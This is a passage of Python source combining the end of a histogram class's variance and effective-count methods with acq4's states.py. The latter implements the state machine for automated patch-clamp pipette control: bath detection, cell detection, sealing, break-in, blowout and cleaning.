view.sum_of_weights, # type: ignore
out=np.full(view.sum_of_weights.shape, np.nan), # type: ignore
where=view.sum_of_weights > 1, # type: ignore
)
elif hasattr(view, "count"):
return np.divide( # type: ignore
view.variance, # type: ignore
view.count, # type: ignore
out=np.full(view.count.shape, np.nan), # type: ignore
where=view.count > 1, # type: ignore
)
else:
return view.variance # type: ignore
def counts(self, flow: bool = False) -> "np.typing.NDArray[Any]":
"""
Returns the number of entries in each bin for an unweighted
histogram or profile and an effective number of entries (defined below)
for a weighted histogram or profile. An exotic generalized histogram could
have no sensible .counts, so this is Optional and should be checked by
Consumers.
If kind == "MEAN", counts (effective or not) can and should be used to
determine whether the mean value and its variance should be displayed
(see documentation of values and variances, respectively). The counts
should also be used to compute the error on the mean (see documentation
of variances).
For a weighted histogram, counts is defined as sum_of_weights ** 2 /
sum_of_weights_squared. It is equal or less than the number of times
the bin was filled, the equality holds when all filled weights are equal.
The larger the spread in weights, the smaller it is, but it is always 0
if filled 0 times, and 1 if filled once, and more than 1 otherwise.
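For example (illustrative): weights [2, 2] give 4**2 / 8 = 2 (equal weights
recover the true count), while [1, 3] give 4**2 / 10 = 1.6.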
:return: "np.typing.NDArray[Any]"[np.float64]
"""
view = self.view(flow)
if len(view.dtype) == 0: # type: ignore
return view
elif hasattr(view, "sum_of_weights"):
return np.divide( # type: ignore
view.sum_of_weights ** 2, # type: ignore
view.sum_of_weights_squared, # type: ignore
out=np.zeros_like(view.sum_of_weights, dtype=np.float64), # type: ignore
where=view.sum_of_weights_squared != 0, # type: ignore
)
elif hasattr(view, "count"):
return view.count # type: ignore
else:
return view.value # type: ignore
if TYPE_CHECKING:
import typing
from uhi.typing.plottable import PlottableHistogram
_: PlottableHistogram = typing.cast(Histogram, None)
|
states.py
|
from __future__ import print_function
import threading
import sys, time
import numpy as np
import scipy.stats
from six.moves import range, queue
from pyqtgraph import ptime, disconnect
from acq4.util.future import Future
from collections import deque
from acq4.util.debug import printExc
class PatchPipetteState(Future):
"""Base class for implementing the details of a patch pipette state:
- Set initial pressure, clamp parameters, position, etc when starting the state
- Optionally run a background thread; usually this will monitor pipette resistance
and affect the pipette pressure, holding value, or position.
This class is the base for the other state subclasses and just takes care of some boilerplate:
- assembling config from defaults and init args
- set initial device state
- starting thread (if run() method is implemented)
- handling various job failure / finish modes
- communicating next state transition to the state manager
"""
# state subclasses must set a string name
stateName = None
# State classes may implement a run() method to be called in a background thread
run = None
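# Minimal subclass sketch (illustrative only, not part of acq4):
#   class MyState(PatchPipetteState):
#       stateName = 'my state'
#       _defaultConfig = {'fallbackState': 'bath'}
#       def run(self):
#           self.monitorTestPulse()
#           while True:
#               self._checkStop()   # raises StopRequested when the state is stopped
#               tps = self.getTestPulses(timeout=0.2)
#               if tps:
#                   return 'next state name'   # becomes self.nextState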
def __init__(self, dev, config=None):
Future.__init__(self)
self.dev = dev
# generate full config by combining passed-in arguments with default config
self.config = self.defaultConfig()
if config is not None:
self.config.update(config)
# indicates state that should be transitioned to next, if any.
# This is usually set by the return value of run(), and must be invoked by the state manager.
self.nextState = self.config.get('fallbackState', None)
def initialize(self):
"""Initialize pressure, clamp, etc. and start background thread when entering this state.
This method is called by the state manager.
"""
try:
if self.config.get('finishPatchRecord') is True:
self.dev.finishPatchRecord()
if self.config.get('newPipette') is True:
self.dev.newPipette()
self.initializePressure()
self.initializeClamp()
# set up test pulse monitoring
self.testPulseResults = queue.Queue()
if self.run is not None and self.dev.active:
# start background thread if the device is "active" and the subclass has a run() method
self._thread = threading.Thread(target=self._runJob)
self._thread.start()
else:
# otherwise, just mark the task complete
self._taskDone(interrupted=False, error=None)
except Exception as exc:
self._taskDone(interrupted=True, error=str(exc))
raise
def initializePressure(self):
"""Set initial pressure based on the config keys 'initialPressureSource' and 'initialPressure'
"""
if self.dev.pressureDevice is None:
return
pressure = self.config.get('initialPressure', None)
source = self.config.get('initialPressureSource', None)
self.dev.pressureDevice.setPressure(source=source, pressure=pressure)
def initializeClamp(self):
"""Set initial clamp parameters based on the config keys
'initialClampMode', 'initialClampHolding', and 'initialTestPulseEnable'.
"""
cdev = self.dev.clampDevice
if cdev is None:
return
mode = self.config.get('initialClampMode')
holding = self.config.get('initialClampHolding')
tp = self.config.get('initialTestPulseEnable')
tpParams = self.config.get('initialTestPulseParameters')
bias = self.config.get('initialAutoBiasEnable')
biasTarget = self.config.get('initialAutoBiasTarget')
if mode is not None:
cdev.setMode(mode)
if holding is not None:
cdev.setHolding(mode=mode, value=holding)
if tpParams is None:
tpParams = {}
tpParams.setdefault('clampMode', mode)
# enable test pulse if config requests it AND the device is "active"
if tp is not None:
self.dev.enableTestPulse(tp and self.dev.active)
if tpParams is not None:
self.dev.setTestPulseParameters(**tpParams)
if bias is not None:
self.dev.enableAutoBias(bias)
if biasTarget is not None:
self.dev.setAutoBiasTarget(biasTarget)
def monitorTestPulse(self):
"""Begin acquiring test pulse data in self.testPulseResults
"""
self.dev.sigTestPulseFinished.connect(self.testPulseFinished)
def testPulseFinished(self, pip, result):
self.testPulseResults.put(result)
def getTestPulses(self, timeout):
"""Get all test pulses in the queue. If no test pulses are available, then
wait *timeout* seconds for one to arrive.
"""
tps = []
try:
if timeout is not None:
tps.append(self.testPulseResults.get(timeout=timeout))
while not self.testPulseResults.empty():
tps.append(self.testPulseResults.get())
except queue.Empty:
pass
return tps
def defaultConfig(self):
"""Subclasses may reimplement this method to return a default configuration dict.
"""
return self._defaultConfig
def cleanup(self):
"""Called after job completes, whether it failed or succeeded.
"""
pass
def _runJob(self):
"""Function invoked in background thread.
This calls the custom run() method for the state subclass and handles the possible
error / exit / completion states.
"""
error = None
excInfo = None
try:
# run must be reimplemented in subclass and call self._checkStop() frequently
self.nextState = self.run()
interrupted = self.wasInterrupted()
except self.StopRequested:
# state was stopped early by calling stop()
interrupted = True
except Exception as exc:
# state aborted due to an error
interrupted = True
printExc("Error in %s state %s" % (self.dev.name(), self.stateName))
error = str(exc)
excInfo = sys.exc_info()
else:
# state completed successfully
interrupted = False
finally:
disconnect(self.dev.sigTestPulseFinished, self.testPulseFinished)
if not self.isDone():
self._taskDone(interrupted=interrupted, error=error, excInfo=excInfo)
def _checkStop(self, delay=0):
# extend checkStop to also see if the pipette was deactivated.
if self.dev.active is False:
raise self.StopRequested()
Future._checkStop(self, delay)
def __repr__(self):
return '<%s "%s">' % (type(self).__name__, self.stateName)
class PatchPipetteOutState(PatchPipetteState):
stateName = 'out'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': False,
'finishPatchRecord': True,
}
class PatchPipetteApproachState(PatchPipetteState):
stateName = 'approach'
_defaultConfig = {
'nextState': 'cell detect',
'fallbackState': 'bath',
}
def run(self):
# move to approach position + auto pipette offset
fut = self.dev.pipetteDevice.goApproach('fast')
self.dev.clampDevice.autoPipetteOffset()
self.dev.resetTestPulseHistory()
self.waitFor(fut)
return self.config['nextState']
class PatchPipetteWholeCellState(PatchPipetteState):
stateName = 'whole cell'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'initialAutoBiasEnable': True,
'initialAutoBiasTarget': -70e-3,
}
def run(self):
config = self.config
patchrec = self.dev.patchRecord()
patchrec['wholeCellStartTime'] = ptime.time()
patchrec['wholeCellPosition'] = tuple(self.dev.pipetteDevice.globalPosition())
# TODO: Option to switch to I=0 for a few seconds to get initial RMP decay
while True:
# TODO: monitor for cell loss
self._checkStop()
time.sleep(0.1)
def cleanup(self):
patchrec = self.dev.patchRecord()
patchrec['wholeCellStopTime'] = ptime.time()
PatchPipetteState.cleanup(self)
class PatchPipetteBrokenState(PatchPipetteState):
stateName = 'broken'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'finishPatchRecord': True,
}
def initialize(self):
self.dev.setTipBroken(True)
PatchPipetteState.initialize(self)
class PatchPipetteFouledState(PatchPipetteState):
stateName = 'fouled'
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
}
def initialize(self):
self.dev.setTipClean(False)
PatchPipetteState.initialize(self)
class PatchPipetteBathState(PatchPipetteState):
"""Handles detection of changes while in recording chamber
- monitor resistance to detect entry into bath
- auto pipette offset and record initial resistance
- monitor resistance for pipette break / clog
"""
stateName = 'bath'
def __init__(self, *args, **kwds):
PatchPipetteState.__init__(self, *args, **kwds)
_defaultConfig = {
'initialPressure': 3500., # 0.5 PSI
'initialPressureSource': 'regulator',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'bathThreshold': 50e6,
'breakThreshold': -1e6,
'clogThreshold': 1e6,
'targetDistanceThreshold': 10e-6
}
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
initialResistance = None
bathResistances = []
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
tp = tps[-1] # if we're falling behind, just skip the extra test pulses
ssr = tp.analysis()['steadyStateResistance']
if ssr > config['bathThreshold']:
# not in bath yet
bathResistances = []
continue
bathResistances.append(ssr)
if initialResistance is None:
if len(bathResistances) > 8:
initialResistance = np.median(bathResistances)
self.setState('initial resistance measured: %0.2f MOhm' % (initialResistance * 1e-6))
# record initial resistance
patchrec = dev.patchRecord()
patchrec['initialBathResistance'] = initialResistance
piprec = dev.pipetteRecord()
if piprec['originalResistance'] is None:
piprec['originalResistance'] = initialResistance
patchrec['originalPipetteResistance'] = initialResistance
else:
continue
# check for pipette break
if config['breakThreshold'] is not None and (ssr < initialResistance + config['breakThreshold']):
self.setState('broken pipette detected')
self._taskDone(interrupted=True, error="Pipette broken")
return 'broken'
# if close to target, switch to cell detect
# pos = dev.globalPosition()
# target = dev.
if config['clogThreshold'] is not None and (ssr > initialResistance + config['clogThreshold']):
self.setState('clogged pipette detected')
self._taskDone(interrupted=True, error="Pipette clogged")
return 'fouled'
class PatchPipetteCellDetectState(PatchPipetteState):
"""Handles cell detection:
- monitor resistance for cell proximity => seal mode
- monitor resistance for pipette break
TODO:
- Obstacle avoidance
"""
stateName = 'cell detect'
def __init__(self, *args, **kwds):
self.contAdvanceFuture = None
self.lastMove = 0.0
self.stepCount = 0
self.advanceSteps = None
PatchPipetteState.__init__(self, *args, **kwds)
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'fallbackState': 'bath',
'autoAdvance': True,
'advanceMode': 'target',
'advanceContinuous': True,
'advanceStepInterval': 0.1,
'advanceStepDistance': 1e-6,
'maxAdvanceDistance': None,
'maxAdvanceDistancePastTarget': 10e-6,
'maxAdvanceDepthBelowSurface': None,
'advanceSpeed': 2e-6,
'fastDetectionThreshold': 1e6,
'slowDetectionThreshold': 0.2e6,
'slowDetectionSteps': 3,
'breakThreshold': -1e6,
}
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
dev.clampDevice.autoPipetteOffset()
patchrec = dev.patchRecord()
patchrec['attemptedCellDetect'] = True
initialResistance = None
recentTestPulses = deque(maxlen=config['slowDetectionSteps'] + 1)
initialPosition = np.array(dev.pipetteDevice.globalPosition())
patchrec['cellDetectInitialTarget'] = tuple(dev.pipetteDevice.targetPosition())
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
recentTestPulses.extend(tps)
tp = tps[-1]
ssr = tp.analysis()['steadyStateResistance']
if initialResistance is None:
# take note of initial resistance
initialResistance = ssr
# check for pipette break
if ssr < initialResistance + config['breakThreshold']:
self._taskDone(interrupted=True, error="Pipette broken")
patchrec['detectedCell'] = False
return 'broken'
# fast cell detection
if ssr > initialResistance + config['fastDetectionThreshold']:
self.setState("cell detected (fast criteria)")
self._taskDone()
patchrec['detectedCell'] = True
return "seal"
# slow cell detection
if len(recentTestPulses) > config['slowDetectionSteps']:
res = np.array([tp.analysis()['steadyStateResistance'] for tp in recentTestPulses])
if np.all(np.diff(res) > 0) and ssr - initialResistance > config['slowDetectionThreshold']:
self.setState("cell detected (slow criteria)")
self._taskDone()
patchrec['detectedCell'] = True
return "seal"
self._checkStop()
if config['autoAdvance']:
if config['advanceContinuous']:
# Start continuous move if needed
if self.contAdvanceFuture is None:
print(initialPosition)
print(self.getSearchEndpoint())
self.startContinuousMove()
if self.contAdvanceFuture.isDone():
self.contAdvanceFuture.wait() # check for move errors
self._taskDone(interrupted=True, error="No cell found before end of search path")
patchrec['detectedCell'] = False
return config['fallbackState']
else:
# advance to next position if stepping
if self.advanceSteps is None:
self.advanceSteps = self.getAdvanceSteps()
print(len(self.advanceSteps))
print(self.advanceSteps)
if self.stepCount >= len(self.advanceSteps):
self._taskDone(interrupted=True, error="No cell found before end of search path")
patchrec['detectedCell'] = False
return config['fallbackState']
# make sure we obey advanceStepInterval
now = ptime.time()
if now - self.lastMove < config['advanceStepInterval']:
continue
self.lastMove = now
self.singleStep()
def getSearchEndpoint(self):
"""Return the final position along the pipette search path, taking into account
maxAdvanceDistance, maxAdvanceDepthBelowSurface, and maxAdvanceDistancePastTarget.
"""
config = self.config
dev = self.dev
pip = dev.pipetteDevice
pos = np.array(pip.globalPosition())
surface = pip.scopeDevice().getSurfaceDepth()
target = np.array(pip.targetPosition())
# what direction are we moving?
if config['advanceMode'] == 'vertical':
direction = np.array([0.0, 0.0, -1.0])
elif config['advanceMode'] == 'axial':
direction = pip.globalDirection()
elif config['advanceMode'] == 'target':
direction = target - pos
else:
raise ValueError("advanceMode must be 'vertical', 'axial', or 'target' (got %r)" % config['advanceMode'])
direction = direction / np.linalg.norm(direction)
endpoint = None
# max search distance
if config['maxAdvanceDistance'] is not None:
endpoint = pos + direction * config['maxAdvanceDistance']
# max surface depth
if config['maxAdvanceDepthBelowSurface'] is not None and direction[2] < 0:
endDepth = surface - config['maxAdvanceDepthBelowSurface']
dz = endDepth - pos[2]
depthEndpt = pos + direction * (dz / direction[2])
# is the surface depth endpoint closer?
if endpoint is None or np.linalg.norm(endpoint-pos) > np.linalg.norm(depthEndpt-pos):
endpoint = depthEndpt
# max distance past target
if config['advanceMode'] == 'target' and config['maxAdvanceDistancePastTarget'] is not None:
targetEndpt = target + direction * config['maxAdvanceDistancePastTarget']
# is the target endpoint closer?
if endpoint is None or np.linalg.norm(endpoint-pos) > np.linalg.norm(targetEndpt-pos):
endpoint = targetEndpt
if endpoint is None:
raise Exception("Cell detect state requires one of maxAdvanceDistance, maxAdvanceDepthBelowSurface, or maxAdvanceDistancePastTarget.")
return endpoint
def startContinuousMove(self):
"""Begin moving pipette continuously along search path.
"""
endpoint = self.getSearchEndpoint()
self.contAdvanceFuture = self.dev.pipetteDevice._moveToGlobal(endpoint, speed=self.config['advanceSpeed'])
def getAdvanceSteps(self):
"""Return the list of step positions to take along the search path.
"""
config = self.config
endpoint = self.getSearchEndpoint()
pos = np.array(self.dev.pipetteDevice.globalPosition())
diff = endpoint - pos
dist = np.linalg.norm(diff)
nSteps = int(dist / config['advanceStepDistance'])
step = diff * config['advanceStepDistance'] / dist
return pos[np.newaxis, :] + step[np.newaxis, :] * np.arange(nSteps)[:, np.newaxis]
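# For example (illustrative): a 5.5 um path with advanceStepDistance = 1 um
# yields 5 positions spaced 1 um apart (the first is the current position),
# stopping short of the search endpoint.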
def singleStep(self):
"""Advance a single step in the search path and block until the move has finished.
"""
config = self.config
dev = self.dev
stepPos = self.advanceSteps[self.stepCount]
self.stepCount += 1
fut = dev.pipetteDevice._moveToGlobal(stepPos, speed=config['advanceSpeed'])
self.waitFor(fut)
def cleanup(self):
if self.contAdvanceFuture is not None:
self.contAdvanceFuture.stop()
patchrec = self.dev.patchRecord()
patchrec['cellDetectFinalTarget'] = tuple(self.dev.pipetteDevice.targetPosition())
PatchPipetteState.cleanup(self)
class PatchPipetteSealState(PatchPipetteState):
"""Handles sealing onto cell
State name: "seal"
- monitor resistance to detect loose seal and GOhm seal
- set holding potential after loose seal
- modulate pressure to improve likelihood of forming seal
- cut pressure after GOhm and transition to cell attached
Parameters
----------
pressureMode : str
'auto' enables automatic pressure control during sealing;
'user' simply switches to user control for sealing.
startingPressure : float
Initial pressure (Pascals) to apply when beginning sealing in 'auto' mode.
holdingThreshold : float
Seal resistance (ohms) above which the holding potential will switch
from its initial value to the value specified in the *holdingPotential*
parameter.
holdingPotential : float
Holding potential (volts) to apply to the pipette after the seal resistance
becomes greater than *holdingThreshold*.
sealThreshold : float
Seal resistance (ohms) above which the pipette is considered sealed and
transitions to the 'cell attached' state.
breakInThreshold : float
Capacitance (Farads) above which the pipette is considered to be whole-cell and
transitions to the 'break in' state (in case of partial break-in, we don't want to transition
directly to 'whole cell' state).
nSlopeSamples : int
Number of consecutive test pulse measurements over which the rate of change
in seal resistance is measured (for automatic pressure control).
autoSealTimeout : float
Maximum timeout (seconds) before the seal attempt is aborted,
transitioning to *fallbackState*.
maxVacuum : float
The largest vacuum pressure (pascals, negative value) to apply during sealing.
When this pressure is reached, the pressure is reset to 0 and the ramp starts over after a delay.
pressureChangeRates : list
A list of (seal_resistance_threshold, pressure_change) tuples that determine how much to
change the current seal pressure based on the rate of change in seal resistance.
For each iteration, select the first tuple in the list where the current rate of
change in seal resistance is _less_ than the threshold specified in the tuple.
delayBeforePressure : float
Wait time (seconds) at beginning of seal state before applying negative pressure.
delayAfterSeal : float
Wait time (seconds) after GOhm seal is acquired, before transitioning to next state.
afterSealPressure : float
Pressure (Pascals) to apply during *delayAfterSeal* interval. This can help to stabilize the seal after initial formation.
resetDelay : float
Wait time (seconds) after maxVacuum is reached, before restarting pressure ramp.
"""
stateName = 'seal'
_defaultConfig = {
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'fallbackState': 'fouled',
'pressureMode': 'user', # 'auto' or 'user'
'startingPressure': -1000,
'holdingThreshold': 100e6,
'holdingPotential': -70e-3,
'sealThreshold': 1e9,
'breakInThreshold': 10e-12,
'nSlopeSamples': 5,
'autoSealTimeout': 30.0,
'maxVacuum': -3e3, #changed from -7e3
'pressureChangeRates': [(0.5e6, -100), (100e6, 0), (-1e6, 200)], #initially 1e6,150e6,None
'delayBeforePressure': 0.0,
'delayAfterSeal': 5.0,
'afterSealPressure': -1000,
'resetDelay': 5.0,
}
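# Worked example with the default pressureChangeRates above: a resistance slope
# below 0.5 MOhm/s selects (0.5e6, -100) and adds 100 Pa of suction; a slope
# between 0.5 and 100 MOhm/s selects (100e6, 0) and holds the pressure; larger
# slopes match no entry and leave the pressure unchanged.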
def initialize(self):
self.dev.clean = False
PatchPipetteState.initialize(self)
def run(self):
self.monitorTestPulse()
config = self.config
dev = self.dev
recentTestPulses = deque(maxlen=config['nSlopeSamples'])
while True:
initialTP = dev.lastTestPulse()
if initialTP is not None:
break
self._checkStop()
time.sleep(0.05)
initialResistance = initialTP.analysis()['steadyStateResistance']
patchrec = dev.patchRecord()
patchrec['resistanceBeforeSeal'] = initialResistance
patchrec['capacitanceBeforeSeal'] = initialTP.analysis()['capacitance']
startTime = ptime.time()
pressure = config['startingPressure']
mode = config['pressureMode']
self.setState('beginning seal (mode: %r)' % mode)
if mode == 'user':
dev.pressureDevice.setPressure(source='user', pressure=0)
elif mode == 'auto':
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
else:
raise ValueError("pressureMode must be 'auto' or 'user' (got %r)" % mode)
dev.setTipClean(False)
patchrec['attemptedSeal'] = True
holdingSet = False
while True:
self._checkStop()
# pull in all new test pulses (hopefully only one since the last time we checked)
tps = self.getTestPulses(timeout=0.2)
recentTestPulses.extend(tps)
if len(tps) == 0:
continue
tp = tps[-1]
ssr = tp.analysis()['steadyStateResistance']
cap = tp.analysis()['capacitance']
# if cap > config['breakInThreshold']:
# patchrec['spontaneousBreakin'] = True
# return 'break in'
patchrec['resistanceBeforeBreakin'] = ssr
patchrec['capacitanceBeforeBreakin'] = cap
if not holdingSet and ssr > config['holdingThreshold']:
self.setState('enable holding potential %0.1f mV' % (config['holdingPotential']*1000))
dev.clampDevice.setHolding(mode=None, value=config['holdingPotential'])
holdingSet = True
# seal detected?
if ssr > config['sealThreshold']:
# delay for a short period, possibly applying pressure to allow seal to stabilize
if config['delayAfterSeal'] > 0:
if config['afterSealPressure'] == 0:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
else:
dev.pressureDevice.setPressure(source='regulator', pressure=config['afterSealPressure'])
self.sleep(config['delayAfterSeal'])
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
self.setState('gigaohm seal detected')
dev.clampDevice.autoCapComp()
self._taskDone()
patchrec['sealSuccessful'] = True
return 'cell attached'
if mode == 'auto':
dt = ptime.time() - startTime
if dt < config['delayBeforePressure']:
# delay at atmospheric pressure before starting suction
continue
if dt > config['autoSealTimeout']:
patchrec['sealSuccessful'] = False
self._taskDone(interrupted=True, error="Seal failed after %f seconds" % dt)
return
# update pressure
res = np.array([tp.analysis()['steadyStateResistance'] for tp in recentTestPulses])
times = np.array([tp.startTime() for tp in recentTestPulses])
slope = scipy.stats.linregress(times, res).slope
pressure = np.clip(pressure, config['maxVacuum'], 0)
# decide how much to adjust pressure based on rate of change in seal resistance
for max_slope, change in config['pressureChangeRates']:
if max_slope is None or slope < max_slope:
pressure += change
break
# here, if the maxVacuum has been achieved and we are still sealing, cycle back to 0 and redo the pressure change
if pressure <= config['maxVacuum']:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
self.sleep(config['resetDelay'])
pressure = 0
dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
continue
self.setState('Rpip slope: %g MOhm/sec Pressure: %g Pa' % (slope/1e6, pressure))
dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
def cleanup(self):
self.dev.pressureDevice.setPressure(source='atmosphere')
PatchPipetteState.cleanup(self)
class PatchPipetteCellAttachedState(PatchPipetteState):
"""Pipette in cell-attached configuration
State name: "cell attached"
- automatically transition to 'break in' after a delay
- monitor for spontaneous break-in or loss of attached cell
Parameters
----------
autoBreakInDelay : float
Delay time (seconds) before transitioning to 'break in' state. If None, then never automatically
transition to break-in.
breakInThreshold : float
Capacitance (Farads) above which the pipette is considered to be whole-cell and immediately
transitions to the 'break in' state (in case of partial break-in, we don't want to transition
directly to 'whole cell' state).
holdingCurrentThreshold : float
Holding current (Amps) below which the cell is considered to be lost and the state fails.
spontaneousBreakInState : str
Name of state to transition to when the membrane breaks in spontaneously. Default
is 'break in' so that partial break-ins will be completed. To disable, set to 'whole cell'.
"""
stateName = 'cell attached'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'autoBreakInDelay': None,
'breakInThreshold': 10e-12,
'holdingCurrentThreshold': -1e-9,
'spontaneousBreakInState': 'break in',
}
def run(self):
self.monitorTestPulse()
patchrec = self.dev.patchRecord()
config = self.config
startTime = ptime.time()
delay = config['autoBreakInDelay']
while True:
if delay is not None and ptime.time() - startTime > delay:
return 'break in'
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0:
continue
tp = tps[-1]
holding = tp.analysis()['baselineCurrent']
if holding < self.config['holdingCurrentThreshold']:
self._taskDone(interrupted=True, error='Holding current exceeded threshold.')
return
cap = tp.analysis()['capacitance']
if cap > config['breakInThreshold']:
patchrec['spontaneousBreakin'] = True
return config['spontaneousBreakInState']
patchrec['resistanceBeforeBreakin'] = tp.analysis()['steadyStateResistance']
patchrec['capacitanceBeforeBreakin'] = cap
class PatchPipetteBreakInState(PatchPipetteState):
"""State using pressure pulses to rupture membrane for whole cell recording.
State name: "break in"
- applies a sequence of pressure pulses of increasing strength
- monitors for break-in
Parameters
----------
nPulses : list of int
Number of pressure pulses to apply on each break-in attempt
pulseDurations : list of float
Duration (seconds) of pulses to apply on each break in attempt
pulsePressures : list of float
Pressure (Pascals) of pulses to apply on each break in attempt
pulseInterval : float
Delay (seconds) between break in attempts
capacitanceThreshold : float
Capacitance (Farads) above which to transition to the 'whole cell' state
(note that resistance threshold must also be met)
resistanceThreshold : float
Resistance (Ohms) below which to transition to the 'whole cell' state if
capacitance threshold is met, or fail otherwise.
holdingCurrentThreshold : float
Holding current (Amps) below which the cell is considered to be lost and the state fails.
"""
stateName = 'break in'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': -70e-3,
'initialTestPulseEnable': True,
'nPulses': [1, 1, 1, 1, 1, 2, 2, 3, 3, 5],
'pulseDurations': [0.2, 0.2, 0.2, 0.2, 0.2, 0.2, 0.3, 0.5, 0.7, 1.5],
'pulsePressures': [-30e3, -35e3, -40e3, -50e3, -60e3, -60e3, -60e3, -60e3, -60e3, -60e3],
'pulseInterval': 2,
'resistanceThreshold': 650e6,
'capacitanceThreshold': 10e-12,
'holdingCurrentThreshold': -1e-9,
'fallbackState': 'fouled',
}
def run(self):
patchrec = self.dev.patchRecord()
self.monitorTestPulse()
config = self.config
lastPulse = ptime.time()
attempt = 0
while True:
status = self.checkBreakIn()
if status is True:
patchrec['spontaneousBreakin'] = True
patchrec['breakinSuccessful'] = True
return 'whole cell'
elif status is False:
return
if ptime.time() - lastPulse > config['pulseInterval']:
nPulses = config['nPulses'][attempt]
pdur = config['pulseDurations'][attempt]
press = config['pulsePressures'][attempt]
self.setState('Break in attempt %d' % attempt)
status = self.attemptBreakIn(nPulses, pdur, press)
patchrec['attemptedBreakin'] = True
if status is True:
patchrec['breakinSuccessful'] = True
patchrec['spontaneousBreakin'] = False
return 'whole cell'
elif status is False:
patchrec['breakinSuccessful'] = False
return config['fallbackState']
lastPulse = ptime.time()
attempt += 1
if attempt >= len(config['nPulses']):
self._taskDone(interrupted=True, error='Breakin failed after %d attempts' % attempt)
patchrec['breakinSuccessful'] = False
return config['fallbackState']
def attemptBreakIn(self, nPulses, duration, pressure):
for i in range(nPulses):
# get the next test pulse
status = self.checkBreakIn()
if status is not None:
return status
self.dev.pressureDevice.setPressure(source='regulator', pressure=pressure)
time.sleep(duration)
self.dev.pressureDevice.setPressure(source='atmosphere')
def checkBreakIn(self):
while True:
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) > 0:
break
tp = tps[-1]
analysis = tp.analysis()
holding = analysis['baselineCurrent']
if holding < self.config['holdingCurrentThreshold']:
self._taskDone(interrupted=True, error='Holding current exceeded threshold.')
return False
# If ssr and cap cross threshold => successful break in
# If only ssr crosses threshold => lost cell
# If only cap crosses threshold => partial break in, keep trying
ssr = analysis['steadyStateResistance']
cap = analysis['capacitance']
if self.config['resistanceThreshold'] is not None and ssr < self.config['resistanceThreshold']:
return True
# if cap > self.config['capacitanceThreshold']:
# return True
# else:
# self._taskDone(interrupted=True, error="Resistance dropped below threshold but no cell detected.")
# return False
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after clean")
PatchPipetteState.cleanup(self)
class PatchPipetteResealState(PatchPipetteState):
stateName = 'reseal'
_defaultConfig = {
'fallbackState': 'whole cell',
}
def run(self):
# move to approach position + auto pipette offset
pass
class PatchPipetteBlowoutState(PatchPipetteState):
stateName = 'blowout'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': True,
'blowoutPressure': 65e3,
'blowoutDuration': 2.0,
'fallbackState': 'bath',
}
def run(self):
patchrec = self.dev.patchRecord()
self.monitorTestPulse()
config = self.config
fut = self.dev.pipetteDevice.retractFromSurface()
self.waitFor(fut)
self.dev.pressureDevice.setPressure(source='regulator', pressure=config['blowoutPressure'])
self.sleep(config['blowoutDuration'])
self.dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
# wait until we have a test pulse that ran after blowout was finished.
start = ptime.time()
while True:
self._checkStop()
tps = self.getTestPulses(timeout=0.2)
if len(tps) == 0 or tps[-1].startTime() < start:
continue
break
tp = tps[-1].analysis()
patchrec['resistanceAfterBlowout'] = tp['steadyStateResistance']
self.dev.finishPatchRecord()
return config['fallbackState']
def cleanup(self):
dev = self.dev
try:
dev.pressureDevice.setPressure(source='atmosphere', pressure=0)
except Exception:
printExc("Error resetting pressure after blowout")
PatchPipetteState.cleanup(self)
class PatchPipetteCleanState(PatchPipetteState):
"""Pipette cleaning state.
Cycles +/- pressure in a "clean" bath followed by an optional "rinse" bath.
"""
stateName = 'clean'
_defaultConfig = {
'initialPressureSource': 'atmosphere',
'initialClampMode': 'VC',
'initialClampHolding': 0,
'initialTestPulseEnable': False,
'cleanSequence': [(-35e3, 1.0), (100e3, 1.0)] * 5,
'rinseSequence': [(-35e3, 3.0), (100e3, 10.0)],
'approachHeight': 5e-3,
'fallbackState': 'out',
'finishPatchRecord': True,
}
def __init__(self, *args, **kwds):
self.resetPos = None
self.lastApproachPos = None
PatchPipetteState.__init__(self, *args, **kwds)
def run(self):
self.monitorTestPulse()
config = self.config.copy()
dev = self.dev
self.setState('cleaning')
dev.pipetteDevice.retractFromSurface().wait()
for stage in ('clean', 'rinse'):
self._checkStop()
sequence = config[stage + 'Sequence']
if len(sequence) == 0:
continue
pos = dev.pipetteDevice.loadPosition(stage)
if pos is None:
raise Exception("Device %s does not have a stored %s position." % (dev.pipetteDevice.name(), stage))
self.gotoApproachPosition(pos)
# todo: if needed, we can check TP for capacitance changes here
# and stop moving as soon as the fluid is detected
self.waitFor([dev.pipetteDevice._moveToGlobal(pos, 'fast')])
for pressure, delay in sequence:
